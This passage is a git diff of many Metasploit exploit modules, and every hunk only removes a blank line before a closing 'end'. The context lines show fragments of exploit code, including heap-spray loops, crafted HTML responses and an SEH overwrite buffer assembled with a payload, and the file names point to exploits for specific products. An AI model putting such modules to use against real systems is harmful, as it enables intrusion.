b/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb index 2ed2cb2dff..00b4781e1d 100644 --- a/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb +++ b/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb @@ -194,7 +194,6 @@ SetLocale(#{var_origLoc})|) send_response(cli, html, {'Content-Type'=>'text/html'}) end - end =begin diff --git a/modules/exploits/windows/browser/orbit_connecting.rb b/modules/exploits/windows/browser/orbit_connecting.rb index 4db470857a..afeae52604 100644 --- a/modules/exploits/windows/browser/orbit_connecting.rb +++ b/modules/exploits/windows/browser/orbit_connecting.rb @@ -87,5 +87,4 @@ var #{strname} = new String('#{sploit}'); # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/ovftool_format_string.rb b/modules/exploits/windows/browser/ovftool_format_string.rb index de6ded80e2..79deb12d04 100644 --- a/modules/exploits/windows/browser/ovftool_format_string.rb +++ b/modules/exploits/windows/browser/ovftool_format_string.rb @@ -126,5 +126,4 @@ xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> print_status("Sending OVF exploit...") send_response(cli, ovf, {'Content-Type'=>'text/xml'}) end - end diff --git a/modules/exploits/windows/browser/persits_xupload_traversal.rb b/modules/exploits/windows/browser/persits_xupload_traversal.rb index 195bf2eca2..ecf670ffdb 100644 --- a/modules/exploits/windows/browser/persits_xupload_traversal.rb +++ b/modules/exploits/windows/browser/persits_xupload_traversal.rb @@ -127,5 +127,4 @@ function #{func}() # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/quickr_qp2_bof.rb b/modules/exploits/windows/browser/quickr_qp2_bof.rb index 7df9f0b1d8..d09f30fc4f 100644 --- a/modules/exploits/windows/browser/quickr_qp2_bof.rb +++ b/modules/exploits/windows/browser/quickr_qp2_bof.rb @@ -260,5 +260,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Sending HTML...") send_response(cli, html, {'Content-Type'=>'text/html'}) end - end diff --git a/modules/exploits/windows/browser/realplayer_console.rb b/modules/exploits/windows/browser/realplayer_console.rb index 4defb12162..975408d3e3 100644 --- a/modules/exploits/windows/browser/realplayer_console.rb +++ b/modules/exploits/windows/browser/realplayer_console.rb @@ -111,5 +111,4 @@ while (#{j_ret}.length < #{offset}) #{j_ret} += #{j_ret}; # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/realplayer_import.rb b/modules/exploits/windows/browser/realplayer_import.rb index 1e8e395251..2e1cc4121f 100644 --- a/modules/exploits/windows/browser/realplayer_import.rb +++ b/modules/exploits/windows/browser/realplayer_import.rb @@ -94,5 +94,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/realplayer_qcp.rb b/modules/exploits/windows/browser/realplayer_qcp.rb index 1a5cfcbc75..5509c73a3e 100644 --- a/modules/exploits/windows/browser/realplayer_qcp.rb +++ b/modules/exploits/windows/browser/realplayer_qcp.rb @@ -235,5 +235,4 @@ class MetasploitModule < Msf::Exploit::Remote spray = heaplib(spray) return spray end - end diff --git a/modules/exploits/windows/browser/realplayer_smil.rb b/modules/exploits/windows/browser/realplayer_smil.rb index d777345961..27d6895f5f 100644 --- a/modules/exploits/windows/browser/realplayer_smil.rb +++ b/modules/exploits/windows/browser/realplayer_smil.rb @@ -73,5 +73,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/roxio_cineplayer.rb b/modules/exploits/windows/browser/roxio_cineplayer.rb index de2ec7e116..ca061182e5 100644 --- a/modules/exploits/windows/browser/roxio_cineplayer.rb +++ b/modules/exploits/windows/browser/roxio_cineplayer.rb @@ -108,5 +108,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/safari_xslt_output.rb b/modules/exploits/windows/browser/safari_xslt_output.rb index fb9b1655d6..116f43e735 100644 --- a/modules/exploits/windows/browser/safari_xslt_output.rb +++ b/modules/exploits/windows/browser/safari_xslt_output.rb @@ -140,5 +140,4 @@ class MetasploitModule < Msf::Exploit::Remote @mof_content = generate_mof(@mof_name, @vbs_name) super end - end diff --git a/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb b/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb index 2e108e1bdf..1b8c7946ac 100644 --- a/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb +++ b/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb @@ -154,6 +154,5 @@ class MetasploitModule < Msf::Exploit::Remote send_response(cli, html, {'Content-Type'=>'text/html'}) end - end diff --git a/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb b/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb index 67458db09d..474816b04a 100644 --- a/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb +++ b/modules/exploits/windows/browser/sapgui_saveviewtosessionfile.rb @@ -107,5 +107,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb b/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb index c36423d334..1fb1974807 100644 --- a/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb +++ b/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb @@ -491,5 +491,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Sending HTML...") send_response(cli, html, {'Content-Type'=>'text/html'}) end - end diff --git a/modules/exploits/windows/browser/softartisans_getdrivename.rb b/modules/exploits/windows/browser/softartisans_getdrivename.rb index 8b55bd79d6..af82b81343 100644 --- a/modules/exploits/windows/browser/softartisans_getdrivename.rb +++ b/modules/exploits/windows/browser/softartisans_getdrivename.rb @@ -111,5 +111,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/sonicwall_addrouteentry.rb b/modules/exploits/windows/browser/sonicwall_addrouteentry.rb index 57ef372440..f56af2fa9a 100644 --- a/modules/exploits/windows/browser/sonicwall_addrouteentry.rb +++ b/modules/exploits/windows/browser/sonicwall_addrouteentry.rb @@ -83,5 +83,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb b/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb index b79dabfa92..d95114ff18 100644 --- a/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb +++ b/modules/exploits/windows/browser/symantec_altirisdeployment_runcmd.rb @@ -111,5 +111,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/symantec_appstream_unsafe.rb b/modules/exploits/windows/browser/symantec_appstream_unsafe.rb index 7503efd5dc..d96bb43a16 100644 --- a/modules/exploits/windows/browser/symantec_appstream_unsafe.rb +++ b/modules/exploits/windows/browser/symantec_appstream_unsafe.rb @@ -81,5 +81,4 @@ class MetasploitModule < Msf::Exploit::Remote handler(cli) end - end diff --git a/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb b/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb index 41f7fd511d..d515573a43 100644 --- a/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb +++ b/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb @@ -116,5 +116,4 @@ try { # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb b/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb index 7e598cd214..17a67d6004 100644 --- a/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb +++ b/modules/exploits/windows/browser/symantec_consoleutilities_browseandsavefile.rb @@ -98,5 +98,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb b/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb index f33596c7d0..115754dafe 100644 --- a/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb +++ b/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb @@ -81,5 +81,4 @@ class MetasploitModule < Msf::Exploit::Remote handler(cli) end - end diff --git a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb index c81ad09e2d..1bf7522962 100644 --- a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb +++ b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb @@ -255,7 +255,6 @@ class MetasploitModule < Msf::Exploit::Remote send_response(cli, html, {'Content-Type'=>'text/html'}) end - end =begin diff --git a/modules/exploits/windows/browser/trendmicro_officescan.rb b/modules/exploits/windows/browser/trendmicro_officescan.rb index c8c391d661..49c7a43d17 100644 --- a/modules/exploits/windows/browser/trendmicro_officescan.rb +++ b/modules/exploits/windows/browser/trendmicro_officescan.rb @@ -83,5 +83,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/tumbleweed_filetransfer.rb b/modules/exploits/windows/browser/tumbleweed_filetransfer.rb index f52ba4fa39..b7b7ba63f4 100644 --- a/modules/exploits/windows/browser/tumbleweed_filetransfer.rb +++ b/modules/exploits/windows/browser/tumbleweed_filetransfer.rb @@ -82,5 +82,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb b/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb index 4b990fa685..871f53f51e 100644 --- a/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb +++ b/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb @@ -141,7 +141,6 @@ class MetasploitModule < Msf::Exploit::Remote send_response(cli, html, {'Content-Type'=>'text/html'}) end - end =begin diff --git a/modules/exploits/windows/browser/ultraoffice_httpupload.rb b/modules/exploits/windows/browser/ultraoffice_httpupload.rb index dda8e92016..7f93095d9d 100644 --- a/modules/exploits/windows/browser/ultraoffice_httpupload.rb +++ b/modules/exploits/windows/browser/ultraoffice_httpupload.rb @@ -134,5 +134,4 @@ Please wait... handler(cli) end - end diff --git a/modules/exploits/windows/browser/verypdf_pdfview.rb b/modules/exploits/windows/browser/verypdf_pdfview.rb index 3a15f0ec2d..e0742cce31 100644 --- a/modules/exploits/windows/browser/verypdf_pdfview.rb +++ b/modules/exploits/windows/browser/verypdf_pdfview.rb @@ -105,5 +105,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/webex_ucf_newobject.rb b/modules/exploits/windows/browser/webex_ucf_newobject.rb index 4dda3879f0..afe4947c48 100644 --- a/modules/exploits/windows/browser/webex_ucf_newobject.rb +++ b/modules/exploits/windows/browser/webex_ucf_newobject.rb @@ -143,5 +143,4 @@ Please wait... handler(cli) end - end diff --git a/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb b/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb index 6e061696f1..70b9447000 100644 --- a/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb +++ b/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb @@ -93,5 +93,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Sending #{self.name}") send_response_html(cli, content) end - end diff --git a/modules/exploits/windows/browser/winamp_playlist_unc.rb b/modules/exploits/windows/browser/winamp_playlist_unc.rb index 9e1c30b96b..b77a1bdea6 100644 --- a/modules/exploits/windows/browser/winamp_playlist_unc.rb +++ b/modules/exploits/windows/browser/winamp_playlist_unc.rb @@ -141,5 +141,4 @@ class MetasploitModule < Msf::Exploit::Remote end return songs end - end diff --git a/modules/exploits/windows/browser/winamp_ultravox.rb b/modules/exploits/windows/browser/winamp_ultravox.rb index d7d0964ba0..7ec3f125cd 100644 --- a/modules/exploits/windows/browser/winamp_ultravox.rb +++ b/modules/exploits/windows/browser/winamp_ultravox.rb @@ -87,7 +87,6 @@ class MetasploitModule < Msf::Exploit::Remote service.close_client(client) end - end diff --git a/modules/exploits/windows/browser/windvd7_applicationtype.rb b/modules/exploits/windows/browser/windvd7_applicationtype.rb index fb4c5da46e..891ae47e12 100644 --- a/modules/exploits/windows/browser/windvd7_applicationtype.rb +++ b/modules/exploits/windows/browser/windvd7_applicationtype.rb @@ -78,5 +78,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/winzip_fileview.rb b/modules/exploits/windows/browser/winzip_fileview.rb index 7df3ea0a16..a40f2d6a93 100644 --- a/modules/exploits/windows/browser/winzip_fileview.rb +++ b/modules/exploits/windows/browser/winzip_fileview.rb @@ -119,5 +119,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/wmi_admintools.rb b/modules/exploits/windows/browser/wmi_admintools.rb index 57d21780e8..5533b6e9e6 100644 --- a/modules/exploits/windows/browser/wmi_admintools.rb +++ b/modules/exploits/windows/browser/wmi_admintools.rb @@ -309,5 +309,4 @@ EOS fail_with(Failure::BadConfig, "Unable to locate key: \"#{key}\"") if not rvas[key] rvas['BaseAddress'] + rvas[key] end - end diff --git a/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb b/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb index dec324068b..6c845ee26f 100644 --- a/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb +++ b/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb @@ -142,5 +142,4 @@ class MetasploitModule < Msf::Exploit::Remote def strip_comments(input) input.gsub(/\/\/.*$/, '') end - end diff --git a/modules/exploits/windows/browser/xmplay_asx.rb b/modules/exploits/windows/browser/xmplay_asx.rb index 7f0a725345..39c56fd7a3 100644 --- a/modules/exploits/windows/browser/xmplay_asx.rb +++ b/modules/exploits/windows/browser/xmplay_asx.rb @@ -71,5 +71,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/yahoomessenger_fvcom.rb b/modules/exploits/windows/browser/yahoomessenger_fvcom.rb index 06a18e92bc..04a75d578c 100644 --- a/modules/exploits/windows/browser/yahoomessenger_fvcom.rb +++ b/modules/exploits/windows/browser/yahoomessenger_fvcom.rb @@ -84,5 +84,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/yahoomessenger_server.rb b/modules/exploits/windows/browser/yahoomessenger_server.rb index 74f88c63c6..fb83be0ed3 100644 --- a/modules/exploits/windows/browser/yahoomessenger_server.rb +++ b/modules/exploits/windows/browser/yahoomessenger_server.rb @@ -78,5 +78,4 @@ class MetasploitModule < Msf::Exploit::Remote # Handle the payload handler(cli) end - end diff --git a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb index 1de35aea01..4da960843e 100644 --- a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb +++ b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb @@ -84,5 +84,4 @@ class MetasploitModule < Msf::Exploit::Remote handler(cli) end - end diff --git a/modules/exploits/windows/dcerpc/ms03_026_dcom.rb b/modules/exploits/windows/dcerpc/ms03_026_dcom.rb index 4de3ad69eb..c344dd3d82 100644 --- a/modules/exploits/windows/dcerpc/ms03_026_dcom.rb +++ b/modules/exploits/windows/dcerpc/ms03_026_dcom.rb @@ -213,5 +213,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/dcerpc/ms05_017_msmq.rb b/modules/exploits/windows/dcerpc/ms05_017_msmq.rb index d45a89d418..d57f0d1135 100644 --- a/modules/exploits/windows/dcerpc/ms05_017_msmq.rb +++ b/modules/exploits/windows/dcerpc/ms05_017_msmq.rb @@ -145,5 +145,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb b/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb index 6940cda9b2..06dd02bc78 100644 --- a/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb +++ b/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb @@ -279,5 +279,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/dcerpc/ms07_065_msmq.rb b/modules/exploits/windows/dcerpc/ms07_065_msmq.rb index d338b51112..97b75ae5a1 100644 --- a/modules/exploits/windows/dcerpc/ms07_065_msmq.rb +++ b/modules/exploits/windows/dcerpc/ms07_065_msmq.rb @@ -142,5 +142,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb b/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb index be4e5ef213..b40b6b3259 100644 --- a/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb +++ b/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb @@ -333,5 +333,4 @@ class MetasploitModule < Msf::Exploit::Remote def generate_padding rand_text_alphanumeric(rand(128)+4) end - end diff --git a/modules/exploits/windows/emc/alphastor_agent.rb b/modules/exploits/windows/emc/alphastor_agent.rb index 0210caf6b4..5c0a26ef16 100644 --- a/modules/exploits/windows/emc/alphastor_agent.rb +++ b/modules/exploits/windows/emc/alphastor_agent.rb @@ -75,5 +75,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/emc/alphastor_device_manager_exec.rb b/modules/exploits/windows/emc/alphastor_device_manager_exec.rb index 73cbfc7388..60038d47c6 100644 --- a/modules/exploits/windows/emc/alphastor_device_manager_exec.rb +++ b/modules/exploits/windows/emc/alphastor_device_manager_exec.rb @@ -120,5 +120,4 @@ class MetasploitModule < Msf::Exploit::Remote data end - end diff --git a/modules/exploits/windows/emc/networker_format_string.rb b/modules/exploits/windows/emc/networker_format_string.rb index 0346154aff..9f2bcf35c6 100644 --- a/modules/exploits/windows/emc/networker_format_string.rb +++ b/modules/exploits/windows/emc/networker_format_string.rb @@ -118,5 +118,4 @@ class MetasploitModule < Msf::Exploit::Remote print_error('EOFError') end end - end diff --git a/modules/exploits/windows/fileformat/a_pdf_wav_to_mp3.rb b/modules/exploits/windows/fileformat/a_pdf_wav_to_mp3.rb index 602b2e7698..15c13785dc 100644 --- a/modules/exploits/windows/fileformat/a_pdf_wav_to_mp3.rb +++ b/modules/exploits/windows/fileformat/a_pdf_wav_to_mp3.rb @@ -67,5 +67,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(sploit) end - end diff --git a/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb b/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb index b872f8e50c..8b8529ee27 100644 --- a/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb +++ b/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb @@ -166,7 +166,6 @@ TEMPLATE print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(plp) end - end diff --git a/modules/exploits/windows/fileformat/acdsee_xpm.rb b/modules/exploits/windows/fileformat/acdsee_xpm.rb index 21212d7979..ae3c537e72 100644 --- a/modules/exploits/windows/fileformat/acdsee_xpm.rb +++ b/modules/exploits/windows/fileformat/acdsee_xpm.rb @@ -75,5 +75,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(xpm) end - end diff --git a/modules/exploits/windows/fileformat/activepdf_webgrabber.rb b/modules/exploits/windows/fileformat/activepdf_webgrabber.rb index e487e13a06..f9c37bd9dd 100644 --- a/modules/exploits/windows/fileformat/activepdf_webgrabber.rb +++ b/modules/exploits/windows/fileformat/activepdf_webgrabber.rb @@ -101,7 +101,6 @@ try { file_create(content) end - end =begin diff --git a/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb b/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb index 1abf1abdc6..443fc77ebb 100644 --- a/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb +++ b/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb @@ -175,5 +175,4 @@ class MetasploitModule < Msf::Exploit::Remote pdf << "%%EOF" << eol end - end diff --git a/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb b/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb index 6b64e13e41..8944195e80 100644 --- a/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb +++ b/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb @@ -559,5 +559,4 @@ EOF pdf << "%%EOF" << eol pdf end - end diff --git a/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb b/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb index 7cfef178a6..a94239edf1 100644 --- a/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb +++ b/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb @@ -423,5 +423,4 @@ for (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+"s"; pdf << "%%EOF" << eol pdf end - end diff --git a/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb b/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb index 239fe7706a..8b15568d3f 100644 --- a/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb +++ b/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb @@ -419,5 +419,4 @@ for (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+"s"; pdf << "%%EOF" << eol pdf end - end diff --git a/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb b/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb index b3368be5dc..4a9eebf81a 100644 --- a/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb +++ b/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb @@ -232,5 +232,4 @@ for(i = 0; i < 128; i++) { memory[i]= #{rand2} + #{rand1}; } pdf << "%%EOF" << eol end - end diff --git a/modules/exploits/windows/fileformat/adobe_geticon.rb b/modules/exploits/windows/fileformat/adobe_geticon.rb index ab4ccb4240..ca56f15601 100644 --- a/modules/exploits/windows/fileformat/adobe_geticon.rb +++ b/modules/exploits/windows/fileformat/adobe_geticon.rb @@ -117,5 +117,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(pdf) end - end diff --git a/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb b/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb index 328912303b..4d5f139385 100644 --- a/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb +++ b/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb @@ -92,5 +92,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(eps) end - end diff --git a/modules/exploits/windows/fileformat/adobe_jbig2decode.rb b/modules/exploits/windows/fileformat/adobe_jbig2decode.rb index f5b0e502a2..70ff05803f 100644 --- a/modules/exploits/windows/fileformat/adobe_jbig2decode.rb +++ b/modules/exploits/windows/fileformat/adobe_jbig2decode.rb @@ -222,5 +222,4 @@ class MetasploitModule < Msf::Exploit::Remote pdf << xrefPosition.to_s() << eol pdf << "%%EOF" << eol end - end diff --git a/modules/exploits/windows/fileformat/adobe_libtiff.rb b/modules/exploits/windows/fileformat/adobe_libtiff.rb index b93724b2b1..5f1f9ab113 100644 --- a/modules/exploits/windows/fileformat/adobe_libtiff.rb +++ b/modules/exploits/windows/fileformat/adobe_libtiff.rb @@ -381,5 +381,4 @@ EOS xml_data end - end diff --git a/modules/exploits/windows/fileformat/adobe_media_newplayer.rb b/modules/exploits/windows/fileformat/adobe_media_newplayer.rb index 89812cded0..29fc6eb2cd 100644 --- a/modules/exploits/windows/fileformat/adobe_media_newplayer.rb +++ b/modules/exploits/windows/fileformat/adobe_media_newplayer.rb @@ -219,5 +219,4 @@ util.printd(#{rand3}, new Date()); pdf << "%%EOF" << eol end - end diff --git a/modules/exploits/windows/fileformat/adobe_reader_u3d.rb b/modules/exploits/windows/fileformat/adobe_reader_u3d.rb index fef900e8df..42ec66b4ef 100644 --- a/modules/exploits/windows/fileformat/adobe_reader_u3d.rb +++ b/modules/exploits/windows/fileformat/adobe_reader_u3d.rb @@ -646,5 +646,4 @@ class MetasploitModule < Msf::Exploit::Remote pdf << xrefPosition.to_s() << eol pdf << "%%EOF" << eol end - end diff --git a/modules/exploits/windows/fileformat/adobe_toolbutton.rb b/modules/exploits/windows/fileformat/adobe_toolbutton.rb index 8cfa23a343..0eadf309b1 100644 --- a/modules/exploits/windows/fileformat/adobe_toolbutton.rb +++ b/modules/exploits/windows/fileformat/adobe_toolbutton.rb @@ -328,7 +328,6 @@ EOF pdf << "%%EOF" << eol pdf end - end diff --git a/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb b/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb index b636ed4904..a3f5c52b6a 100644 --- a/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb +++ b/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb @@ -487,5 +487,4 @@ EOF pdf << "%%EOF" << eol end - end diff --git a/modules/exploits/windows/fileformat/adobe_utilprintf.rb b/modules/exploits/windows/fileformat/adobe_utilprintf.rb index 65030d004d..f43aa6bb10 100644 --- a/modules/exploits/windows/fileformat/adobe_utilprintf.rb +++ b/modules/exploits/windows/fileformat/adobe_utilprintf.rb @@ -172,5 +172,4 @@ class MetasploitModule < Msf::Exploit::Remote pdf << "%%EOF" << eol end - end diff --git a/modules/exploits/windows/fileformat/altap_salamander_pdb.rb b/modules/exploits/windows/fileformat/altap_salamander_pdb.rb index f5aa19eadd..9207f181b6 100644 --- a/modules/exploits/windows/fileformat/altap_salamander_pdb.rb +++ b/modules/exploits/windows/fileformat/altap_salamander_pdb.rb @@ -73,5 +73,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(sploit) end - end diff --git a/modules/exploits/windows/fileformat/aol_phobos_bof.rb b/modules/exploits/windows/fileformat/aol_phobos_bof.rb index 6690e58859..c6fd0f4ce8 100644 --- a/modules/exploits/windows/fileformat/aol_phobos_bof.rb +++ b/modules/exploits/windows/fileformat/aol_phobos_bof.rb @@ -127,5 +127,4 @@ for(#{j_counter}=0;#{j_counter}<=#{offset};#{j_counter}++)#{j_ret}+=unescape('#{ file_create(html) end - end diff --git a/modules/exploits/windows/fileformat/apple_quicktime_texml.rb b/modules/exploits/windows/fileformat/apple_quicktime_texml.rb index 79a58f4429..44952bd37a 100644 --- a/modules/exploits/windows/fileformat/apple_quicktime_texml.rb +++ b/modules/exploits/windows/fileformat/apple_quicktime_texml.rb @@ -127,5 +127,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Creating '#{datastore['FILENAME']}'.") file_create(texml) end - end diff --git a/modules/exploits/windows/fileformat/audio_wkstn_pls.rb b/modules/exploits/windows/fileformat/audio_wkstn_pls.rb index 2d1d2dd3c8..b9b0513bd3 100644 --- a/modules/exploits/windows/fileformat/audio_wkstn_pls.rb +++ b/modules/exploits/windows/fileformat/audio_wkstn_pls.rb @@ -69,5 +69,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(sploit) end - end diff --git a/modules/exploits/windows/fileformat/audiotran_pls.rb b/modules/exploits/windows/fileformat/audiotran_pls.rb index f010b266a2..66684d9825 100644 --- a/modules/exploits/windows/fileformat/audiotran_pls.rb +++ b/modules/exploits/windows/fileformat/audiotran_pls.rb @@ -64,5 +64,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(sploit) end - end diff --git a/modules/exploits/windows/fileformat/bacnet_csv.rb b/modules/exploits/windows/fileformat/bacnet_csv.rb index 225416c75c..79f3422b6d 100644 --- a/modules/exploits/windows/fileformat/bacnet_csv.rb +++ b/modules/exploits/windows/fileformat/bacnet_csv.rb @@ -72,5 +72,4 @@ class MetasploitModule < Msf::Exploit::Remote file_create(csv) end - end diff --git a/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb b/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb index 045fefab43..4bf6ef339f 100644 --- a/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb +++ b/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb @@ -72,5 +72,4 @@ class MetasploitModule < Msf::Exploit junk << seh << jump << padding << payload.encoded end - end diff --git a/modules/exploits/windows/fileformat/blazedvd_plf.rb b/modules/exploits/windows/fileformat/blazedvd_plf.rb index 5fcb79485e..54d2e3465e 100644 --- a/modules/exploits/windows/fileformat/blazedvd_plf.rb +++ b/modules/exploits/windows/fileformat/blazedvd_plf.rb @@ -125,7 +125,6 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(plf) end - end =begin diff --git a/modules/exploits/windows/fileformat/bpftp_client_bps_bof.rb b/modules/exploits/windows/fileformat/bpftp_client_bps_bof.rb index 421652c287..6727750e72 100644 --- a/modules/exploits/windows/fileformat/bpftp_client_bps_bof.rb +++ b/modules/exploits/windows/fileformat/bpftp_client_bps_bof.rb @@ -86,5 +86,4 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Creating 